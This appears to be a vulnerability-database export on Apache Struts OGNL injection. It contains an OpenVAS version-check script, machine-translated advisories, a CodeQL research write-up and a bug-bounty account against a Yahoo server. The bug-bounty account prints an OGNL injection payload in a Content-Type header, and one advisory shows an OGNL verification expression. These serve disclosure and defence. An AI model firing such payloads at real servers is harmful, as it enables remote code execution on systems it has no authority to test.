2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:vmware:vrealize_operations_manager';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140229\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n script_name(\"VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2017-0004.html\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Updates are available\");\n\n script_tag(name:\"summary\", value:\"VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n script_tag(name:\"insight\", value:\"Multiple VMware products contain a remote code execution vulnerability due to the use of Apache Struts 2. Successful exploitation of this issue may result in the complete compromise of an affected product.\");\n\n script_tag(name:\"affected\", value:\"vROps 6.2.1, 6.3, 6.4 and 6.5\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-31 10:25:48 +0200 (Fri, 31 Mar 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vrealize_operations_manager_web_detect.nasl\");\n script_mandatory_keys(\"vmware/vrealize/operations_manager/version\", \"vmware/vrealize/operations_manager/build\");\n\n exit(0);\n\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nif( ! version = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( ! build = get_kb_item( \"vmware/vrealize/operations_manager/build\" ) ) exit( 0 );\n\nif( version =~ \"^6\\.3\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.3.0 Build 5263486';\n\nif( version =~ \"^6\\.2\\.1\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.2.1 Build 5263486';\n\nif( version =~ \"^6\\.4\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.4.0 Build 5263486';\n\nif( version =~ \"^6\\.5\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.5.0 Build 5263486';\n\n\nif( fix )\n{\n report = report_fixed_ver( installed_version:version + ' Build ' + build, fixed_version:fix );\n security_message( port:port, data:report );\n exit(0);\n}\n\nexit( 99 );\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2019-03-30T00:37:24", "description": "Through this article, we mainly learn how Apache Struts to achieve OGNL injection. Our examples will be set forth in the Struts of the two critical vulnerabilities: CVE-2017-5638\uff08Equifax information disclosure and CVE-2018-11776\u3002 \nApache Struts is a free open source framework for creating modern Java Web applications. Apache Struts has many serious vulnerabilities, one of its characteristics is to support OGNL object graph navigation language, which is also many loopholes is the main reason. \nOne vulnerability, CVE-2017-5638 directly leads to the 2017 Equifax information leakage, exposure to more than 1. 45 million US citizens personal information. Although the company's annual revenue more than 30 billion dollars, but they still did not escape the Apache Struts MVC framework of a known vulnerability attack. \nThis paper mainly introduces the Apache Struts, and then will guide us how to modify a simple application, the use of OGNL and achieve exploits. Next, we will study in depth the platform on a number of Public Exploit way, and try to use OGNL injection vulnerability. \nAlthough Java developers are familiar with Apache Struts, but the security community often does not do however, which is why we wrote this article for the reason. \nGetting started \nRunning a vulnerable Struts application need to install Apache Tomcat [Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>a). The package of the latest version can be downloaded here as a ZIP. The binary file decompress to a location of your choice we use/var/tomcat, and continues: \ncd /var/tomcat/bin # go to the unzipped folder \nchmod +x *. sh # set the script to executable file \n./ startup.sh # run the startup script \nOur visit to http://localhost:8080/, and check whether the site running. \nAfter the confirmation, we are ready to download the old version of the Apache Struts framework, which is vulnerable to our upcoming demo of the vulnerability attack. This page provides to meet our needs 2. 3. 30 version The Struts in. \nIn the extract compressed content, we should be in the/apps position seen under struts2-showcase. war file. This is one use of the Struts compiled and ready to deploy demo application. Just need the WAR file is copied to/var/tomcat/webapps, and access http://localhost:8080/struts2-showcase/showcase. action confirm whether it is valid. \n[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)the basics \nIf you have a good grasp of the Java Web applications related to simple concepts such as Servlets, then you would have been leading. If you are new to the Java Servlet knows nothing about, it can be understood simply as a component, its purpose is to create for in the[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)hosted on Web applications the Web container, in addition, it is also responsible for the processing of the/struts2-showcase and other Java applications request. \nTo the processing Servlet, the[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>), for example Apache Tomcat requires some Assembly: \n1\\. Apache Coyote is to support the HTTP/1.1 Protocol connector. It allows the Servlet container components of Apache Catalina to communicate. \n2\\. Apache Catalina container when determined in the Tomcat receives an HTTP request, you need to call which the Servlet container. It will also HTTP request and response from the text is converted to a Servlet using a Java object. \n! [](/Article/UploadPic/2019-3/201933032655612. png) \nHere you can find information about the Java Servlet specification for all the details of the latest version 4. 0 in. \nApache Struts basics \nWith Java Web applications using the Apache Struts Framework application can have multiple Servlet. This article's main purpose is not to let everyone understand this to build the Web application framework, but on the surface the hang of the basic concepts. We can step-by-step tutorial on the subject. \nThe Apache Struts framework relies on MVC model-View-Controller architecture pattern. IT application very helpful, because you can separate the main application components: \n1\\. Model: represents the application data, for example, using\u201corders\u201dand other data of the class. \n2\\. View: is the output of the application, the visual part. \n3\\. The controller: receiving a user input, using the model to generate the view. \n4\\. Action Actions: the Apache Struts in the model. \n5\\. Intercept the Interceptors: the part of the controller, they can be in processing the request before or after the invocation of the hook. \n6\\. Value stack/OGNL: a set of objects, for example, model or action object. \n7\\. Result/result type: used to select business logic view. \n8\\. View of technology: the processing of data display. \nYou can see below the Apache Struts Web application General architecture: \n! [](/Article/UploadPic/2019-3/201933032655347.jpg) \nController receives the HTTP request, the FilterDispatcher is responsible for according to the request to invoke the right Operation. And then perform the operation, the view component is ready for a result and sends it to the HTTP response in the user. \nStruts application example \nYou want to start from scratch to write a Struts application takes some time, so we will use an already available rest-showcase demo application, which is a basic front-end a simple REST API. To compile the application, we only need to go into its directory and use Maven to compile: \ncd struts-2.3.30/src/apps/rest-showcase/ \nmvn package \nIn the target directory, we can find the following files: struts2-rest-showcase. war. You can copy it to the Tomcat server's webapps directory, for example:/var/tomcat/webapps to install it. \nThe following is the application source code: \n! [](/Article/UploadPic/2019-3/201933032655780. png) \nThe following are the available file description: \n1\\. Order. java is model, which is a storing order information of a Java class. \npublic class Order { \nString id; \nString clientName; \nint amount; \n... \n} \n2\\. OrdersService. java is a Helper class, which will be the Orders stored in the HashMap of the total, and its management. \npublic class OrdersService { \n\n\n**[1] [[2]](<93410_2.htm>) [[3]](<93410_3.htm>) [[4]](<93410_4.htm>) [[5]](<93410_5.htm>) [[6]](<93410_6.htm>) [next](<93410_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2019-03-30T00:00:00", "type": "myhack58", "title": "Apache Struts OGNL injection vulnerability principle with an example-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2019-03-30T00:00:00", "id": "MYHACK58:62201993410", "href": "http://www.myhack58.com/Article/html/3/62/2019/93410.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-23T14:31:31", "description": "! [](/Article/UploadPic/2018-8/2018823153022212.jpg) \n2018 4 months, I to Apache Struts and the Struts security team reported a new remote code execution vulnerability--CVE-2018-11776\uff08S2-057 in to do some configuration on a server running Struts, and can be accessed via the carefully constructed URL to trigger the vulnerability. This discovery is I the Apache Struts ongoing Safety study of part. In this article, I will describe my discovery of a vulnerability and how to exploit the previous vulnerability information to get the Struts internal working of the principle, create a package Struts-specific concept of the QL query. Run these queries will highlight the problematic code results. These works are hosted on GitHub, later we will also to this repository add more query statement and database to help the Struts and other projects of the security research. \n\nMapping the attack surface \nMany security vulnerabilities are addressed from untrusted sources such as user input stream to a particular location of the sink of the data, and the data using an unsafe way-for example, the SQL query, deserialize, and some other interpreted languages, etc., QL can easily search for such vulnerabilities. You just need to describe the various source and sink, and then let the DataFlow library to accomplish these things. For a particular project, began to investigate such issues, a good method is to view the older version of the software known vulnerabilities. This can be in-depth understanding you want to find the source and sink points. \nThis vulnerability discovery process, I first see a RCE vulnerability S2-032\uff08CVE-2016-3081\uff09, S2-033\uff08CVE-2016-3687 and S2-037\uff08CVE-2016-4438-in. With Struts in many other RCE as RCE relates to the untrusted input is converted to OGNL expressions, allowing an attacker on the server to run arbitrary code. These three vulnerabilities are particularly interesting, not only do they let us on the Struts of the internal working mechanism have some understanding, and these three vulnerabilities actually is the same, also repair three back! \nThese three issues are the remote input through the variable methodName as a method of parameter passing caused OgnlUtil::getValue(). \n! [](/Article/UploadPic/2018-8/2018823153022696. png) \nHere the proxy has ActionProxy type, it is an interface. Note that the definition of it, in addition to the method getMethod\uff08\uff09\uff08in the above code is used to assign a value to the variable methodName addition, there are a variety of methods, such as getActionName\uff08\uff09and getNamespace\uff08\uff09\u3002 These methods look like from the URL to return information, so I'll just assume that all of these methods may return untrusted input. The rear of the article I will in depth research I for these the input from where the investigation.\uff09 \nNow use QL to start on these untrusted source modeling: \n! [](/Article/UploadPic/2018-8/2018823153023567. png) \n\nIdentify the OGNL sink point \nNow that we have identified and described some of the non-trusted source, the next step is to sink the point of doing the same thing. As previously mentioned, many of Struts RCE relates to the remote input parsed for OGNL expressions. Struts has many function will eventually be their arguments as OGNL expressions; for we in this article the start of the three vulnerabilities, the use of a OgnlUtil :: getValue \uff08\uff09, but in the vulnerability S2-045\uff08CVE-2017-5638, using TextParseUtil :: translateVariables\uff08\uff09\u3002 We may be looking for execution of OGNL expressions commonly used function, I feel OgnlUtil :: compileAndExecute\uff09and OgnlUtl :: compileAndExecuteMethod\uff08\uff09looks more games. \nMy description: \n! [](/Article/UploadPic/2018-8/2018823153023415. png) \n\nThe first attempt \nNow we have in QL are defined in the source and sink, we can stain the tracking query using these definitions. By defining DataFlow configured to use the DataFlow library: \n! [](/Article/UploadPic/2018-8/2018823153023702. png) \nHere is what I used before defined isActionProxySource and isOgnlSink it. \nNote that I'm here to reload the isAdditionalFlowStep, so that it can allow me to contain the pollution data is propagated to the additional step. Such as allow me to the project-specific information into the flow configuration. For example, if I have by a network of communicating components, I may be in QL as described in those various network-side code is what allows the DataFlow library to track tainted data. \nFor this particular query, I added two additional process steps for the DataFlow library. First: \n! [](/Article/UploadPic/2018-8/2018823153026173. png) \nIt includes tracking the standard Java library calls, string manipulation, etc. of the standard QL TaintTracking library steps. The second Add is an approximate value, allow me to by a field access track tainted data: \n! [](/Article/UploadPic/2018-8/2018823153026186. png) \nThat is if the field is assigned a tainted value, then as long as the two expressions are the same type of method call, the field visit will also be regarded as pollution. See the following example: \n! [](/Article/UploadPic/2018-8/2018823153026144. png) \nSeen from above, the bar in this. field access may not always be contaminated. For example, if in the bar before not to call foo\uff08\uff09\u3002 Therefore, we are not in the default DataFlow :: Configuration contained in this step, because you cannot guarantee that the data always in this manner the flow, however, for digging vulnerabilities, I think adding this very useful. In later posts I will share some of the similar to the other process steps, these steps for find the bug helpful, but for similar reasons, the default case is not included these steps. \n\nThe initial results and Refine the query \nI'm on the latest version of the source code on the run a bit with QL, found that due to the S2-032, S2-033 S2-037 is still marked. These vulnerabilities obviously already been fixed, why still will be reported problem? \n\n\n**[1] [[2]](<91264_2.htm>) [[3]](<91264_3.htm>) [next](<91264_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-08-23T00:00:00", "type": "myhack58", "title": "S2-057 vulnerability in the original author's README: how to use automated tools find 5 RCE-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4438", "CVE-2017-5638", "CVE-2018-11776", "CVE-2016-3687", "CVE-2016-3081"], "modified": "2018-08-23T00:00:00", "id": "MYHACK58:62201891264", "href": "http://www.myhack58.com/Article/html/3/62/2018/91264.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-23T14:31:18", "description": "It is possible to perform a RCE attack when the namespace value isn't set for a result defined in underlying xml configurations and in the same time, its upper action(s) configurations have no or wildcard namespace. The Same possibility when using the url tag which doesn't have value and action set and in the same time, its upper action(s) configurations have no or wildcard namespace. -- Apache Struts2 Team \n2018 8 May 23, Apache Strust2 released the latest security Bulletin, the Apache Struts2 there is a remote code execution of high-risk vulnerability by Semmle Security Research team of security researchers reporting vulnerabilities number of CVE-2018-11776\uff08S2-057 in. Struts2 in XML configuration, if the namespace value is not set and the Action Configuration is not set or wildcard namespace may lead to remote code execution. \n\n0x01 vulnerability affect \nAffect \nDetermining CVE-2018-11776 as a high-risk vulnerability. \nThe actual scene there are some limitations that need to meet certain conditions. \nImpact version \nStruts 2.3 to 2.3.34 \nThe Struts 2.5 to 2.5.16 \nFix version \nThe Struts 2.3.35 \nThe Struts 2.5.17 \n\n0x02 vulnerability verification \n! [](/Article/UploadPic/2018-8/2018823153240150. png) \nIncoming OGNL expression${2333+2333} \n! [](/Article/UploadPic/2018-8/2018823153240244. png) \nSuccess with the execution of the function, and perform \n! [](/Article/UploadPic/2018-8/2018823153240318. png) \nReturns the result to the URL \n\n0x03 repair recommendations \nThe official recommended to upgrade the Struts to 2. 3. 35 version or 2. 5. 17 version \nThe updated version there are no compatibility issues \n\n0x04 timeline \n2018-08-22 vulnerability disclosure \n2018-08-22 360CERT publish early warning analysis advertisement \n\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-23T00:00:00", "type": "myhack58", "title": "Apache Struts2 S2-057 vulnerability analysis and early warning-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-23T00:00:00", "id": "MYHACK58:62201891267", "href": "http://www.myhack58.com/Article/html/3/62/2018/91267.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-03-16T03:17:43", "description": "Author: janes(know Chong Yu 404 laboratory)\n\nDate: 2017-03-15\n\n## Background description\n\nStruts2 official to GMT 2017 3 December 6, 10pm published Struts2 there is a remote code execution vulnerability vulnerability number S2-045, CVE number: CVE-2017-5638, and rated as high-risk vulnerabilities. Because the vulnerability affects a wide range of\uff08Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10, the vulnerability degree of harm is severe, you can directly access the application system of the server where the control limit, and 3 on 7 May in the morning on the Internet on the outflow of the vulnerability of the PoC and Exp,so, S2-045 vulnerability in the Internet on the impact of rapid expansion, by the Internet companies and the government attach great importance. From vulnerability announcement to now(3.6-3.15)has been more than a week, so take this opportunity to analyze S2-045 in the social media Twitter and on Sina Weibo heat distribution.\n\n## Data acquisition\n\nIf you want to analyze Twitter and on Sina Weibo, S2-045 vulnerability of the heat distribution, then you need to get Twiiter and Facebook on the data, with the data speak. So they use\u201cselenium+phantomjs\u201dgo crawling the data via Twitter and Sina Weibo web page to the search interface, respectively, search for the keyword\u201cs2-045\u201dand\u201cCVE-2017-5638\u201d, then the search results go to the weight and finishing, taking to Twitter and Facebook, the time display of the time zone inconsistencies, using the same crawl page timestamp and then converted to the local time of the way of a unified time zone issues, the crawling data in the time to 2017 year 3 month 14 days afternoon 18 when, the results as shown below.\n\n* Twitter! [](/Article/UploadPic/2017-3/2017316104811455. png)\n\n* Sina Weibo! [](/Article/UploadPic/2017-3/2017316104812512. png)\n\n## Heat analysis\n\nStatistics daily S2-045 vulnerability in the Twitter and on Sina Weibo, the number of occurrences, to obtain the following table, Twitter, the CCP appears 73 times, Sina Weibo, the CCP appears 45 times. On the dissemination of the amount of data, S2-045 vulnerability of the data amount is not large, this reflected from the side of the security vulnerabilities of the information and not by the majority of the people of concern, mainly in the security circle propagation.\n\n| Social media | 3 December 7 | 3 8 March | 3 April 9 | 3 October 10 | 3 11 March | 3 November 12 | 3 13 February | 3 March 14 \n---|---|---|---|---|---|---|---|--- \nTwitter| 16 | 3 | 7 | 15 | 6 | 11 | 15 | 0 \nSina Weibo| 23 | 8 | 7 | 3 | 0 | 0 | 1 | 3 \n\n! [](/Article/UploadPic/2017-3/2017316104812815. png)\n\nUsing the above table of data, production of graphics, get as on the heat distribution from the figure it can be seen:\n\n* 3 month 6 day before the announcement of the S2-045 vulnerability, 3 on 7, on Twitter and on Sina Weibo, the occurrence of the outbreak spread, which is likely to and vulnerabilities of the PoC and Exp in 3 month 7 days you on the Internet widely spread about;\n* Sina Weibo, S2-045 vulnerability to the heat distribution of the overall downward state, in the peak in 3 month 7 days, while Twitter as a whole was undulating trend, 3 on 7th, 3 on 10th and 3 on 13 September are peak;\n* Sina Weibo and Twitter for both the overall potential is not the same, and in 3 on the 7th, Sina Weibo and Twitter are data of the highest peak, but Sina Weibo, the amount of data than Twitter.\n\nThere may be several reasons could explain this phenomenon:\n\n* S2-045 vulnerability is the Chinese found that, 3 on 6 September evening, the official publication of the vulnerability, 3 on 7 on the morning of the vulnerabilities of the PoC and Exp in domestic Internet flow out, by domestic security company-wide attention, this also would explain the 3 on 7 The New Wave of microblogging amount of data over the Twitter phenomenon;\n* Due to the S2-045 vulnerability to serious harm, and quickly spread out of PoC and Exp, and therefore, 3 on 7 August, the domestic security companies will quickly start the emergency response, other Internet companies also in self-examination and patch S2-045 vulnerability, with the vulnerability of repair, on Sina Weibo, the attention naturally reduces, the overall will show a downward trend;\n* Twitter user distribution of a wide range of countries or regions affected by the S2-045 the influence is different, therefore trends appear UPS and downs.\n\n3 December 7, Sina Weibo and Twitter are data peak, then the 3 on 7, data, time period distribution mapping as follows, As can be seen, the morning 8 When before, Sina Weibo and Twitter, the amount of data is 0, 8 to 10 period rooms began to appear, it seems, and working hours more in line with the, The and the data the peak occurred mainly in the afternoon 14 to 18 between, perhaps this is because PoC and Exp on the Internet widely spread, caused the Internet began to be mass attack(reference [HackerNews Struts2 vulnerability disclosure 24 hour](<http://hackernews.cc/archives/7371>)) to.\n\n! [](/Article/UploadPic/2017-3/2017316104812327. png)\n\nFinally, look at Twitter and Sina Weibo on on S2-045 vulnerability in the first message what time and by whom issued, and the results are shown in the following table. Twitter and Sina microblogging issued the first message is not the same person, but the transmission time difference is not much, visible at home and abroad to exploit the perceptual capacity is relatively quite.\n\nIbid., the times are Beijing time, according to the unix time stamp conversion.\n\nSocial media | time | nickname | real identity\n---|---|---|--- \nTwitter | 2017-03-07 09:29:00 | @amannk | \nSina Weibo | 2017-03-07 09:44:29 | gnaw0725 | nsfocus Brand Manager Wang Yang\n\n**[1] [[2]](<84379_2.htm>) [next](<84379_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-16T00:00:00", "type": "myhack58", "title": "The Struts S2-045 vulnerability heat analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-16T00:00:00", "id": "MYHACK58:62201784379", "href": "http://www.myhack58.com/Article/html/3/62/2017/84379.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T09:25:02", "description": "Recently, the national information security vulnerabilities library CNNVD received on the Apache Struts2 \uff08S2-045 remote code execution vulnerability CNNVD-201703-152 the case of the message send. Because the vulnerability affects a wide range of hazard level high, the national information security vulnerabilities library CNNVD for the tracking analysis, the situation is as follows: \nA, vulnerability introduction\nApache Struts is a United States Apache\uff08the Apache Software Foundation is responsible for the maintenance of an open source project, is used to create enterprise-class Java Web application open source MVC framework, mainly to provide two versions of the frame product: Struts 1 and Struts 2 of. \nApacheStruts 2.3.5 \u2013 2.3. 31 version and 2. 5 \u2013 2.5.10 version there is a remote code execution vulnerability CNNVD-201703-152, CVE-2017-5638 it. The vulnerability is due to the upload functionality of the exception handling function does not properly handle user input error information. Lead to a remote attacker by sending malicious packets that exploit the vulnerability in the affected on the server execute arbitrary commands. \nSecond, the vulnerability to hazards\nAn attacker can send malformed HTTP packet to exploit the vulnerability in the affected server to perform system commands, and further can completely control the server, causing a denial of service, data leakage, website creation tampering and other effects. Since the exploit without any pre-conditions such as open dmi, debug, and other functions, and enable any plugins, and therefore vulnerability to harm is more serious. \nThird, the repair measures\nCurrently, the Apache official has been directed to the vulnerabilities released a security announcement. Please the affected users to check whether or not affected by the vulnerability. \nSelf-examination manner\n\u7528\u6237 \u53ef \u67e5\u770b web \u76ee\u5f55 \u4e0b /WEB-INF/lib/ \u76ee\u5f55 \u4e0b \u7684 struts-core.x.x.jar file, if the version in Struts2. 3. 5 to Struts2. 3. 31 and Struts2. 5 to Struts2. 5. 10 between the presence of vulnerabilities. \nUpgrade repair\nAffected users can upgrade to version to Apache Struts 2.3.32 or Apache Struts 2.5.10.1 to eliminate the vulnerability. \nTemporary relief\nAs the user inconvenient to upgrade, may take the following temporary solution: \nl delete commons-fileupload-x. x. x. the jar file will cause the upload function is not available. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-07T00:00:00", "type": "myhack58", "title": "About Apache Struts2\uff08S2-045\uff09vulnerability briefings-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-07T00:00:00", "id": "MYHACK58:62201784024", "href": "http://www.myhack58.com/Article/html/3/62/2017/84024.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-06-07T13:16:58", "description": "I always believe to share with people is a good trait, and I'm also from the vulnerability reward in the field of multi-bit security research experts learned a lot to make me last a lifetime things, so I decided in this article to share with you some of my recent little discovery, hope these things can help you Freebuf of friends early on their own vulnerability reward trip. \n! [](/Article/UploadPic/2017-6/201767192643555. png? www. myhack58. com) \nJust a few months ago, a security research expert in Apache Struts2, found a serious security vulnerability, CVE-2017-5638, probably some of you have heard of this thing. This is a remote code execution vulnerability, then Internet in a large number of Web applications are affected by this vulnerability. About three weeks later, researchers released the Struts2 exploit code. \nIn a dig before the Investigative process, I came across the following link: \nhttps://svdevems01.direct.gq1.yahoo.com/sm/login.jsp \nThis is Yahoo the a login page. \n! [](/Article/UploadPic/2017-6/201767192643648. png? www. myhack58. com) \nI have tried in this page find the vulnerability, but unfortunately I didn't find until I found the following nodes: \nhttps://svdevems01.direct.gq1.yahoo.com/sm/login/loginpagecontentgrabber.do \nNote: If you find a node address contains. action,. do or. go, then, this indicates that this Web application to run a Struts2 to. \nAs I said before, for the Struts2 vulnerability exploit code has been released, and this vulnerability using the process is also very simple. Although I know here there is vulnerability, but ready-made exploit code here does not work, so I feel may be a Web application firewall in the mischief, or that some of the things shield my attack. \nSince I was able to determine where there is indeed a vulnerability, so I couldn't stop. But if you want to submit a valid vulnerability, I have to provide a viable PoC to prove this vulnerability is valuable. After a period of research, I found an article tweet this article tweet describes how to pass a Payload to bypass the WAF and be successfully exploited this vulnerability. \nI the use of detection methods require the use of Content-Type HTTP header to send a specially crafted data packet, the header data as shown below: \nContent-Type:%{#context[\u2018com. opensymphony. xwork2. dispatcher. HttpServletResponse\u2019]. addHeader(\u2018X-Ack-Th3g3nt3lman-POC\u2019,4*4)}. multipart/form-data \nThis specially constructed request can not only make[the Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)to calculate the two multiplied by the number, and you can also request a[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)for any other form of operation. In the above example, the request to calculate the value of 4 * 4, the server returns the result of 16, which means that this server is the presence of security vulnerabilities. \nAs shown in the following figure, the response data will contain the new header, i.e. X-Ack-Th3g3nt3lman-POC: 16 \n! [](/Article/UploadPic/2017-6/201767192643394. png? www. myhack58. com) \nThese have enough I'm through HackerOne to Yahoo to submit a vulnerability report, Yahoo skilled in the art after receiving the report within 30 minutes of the 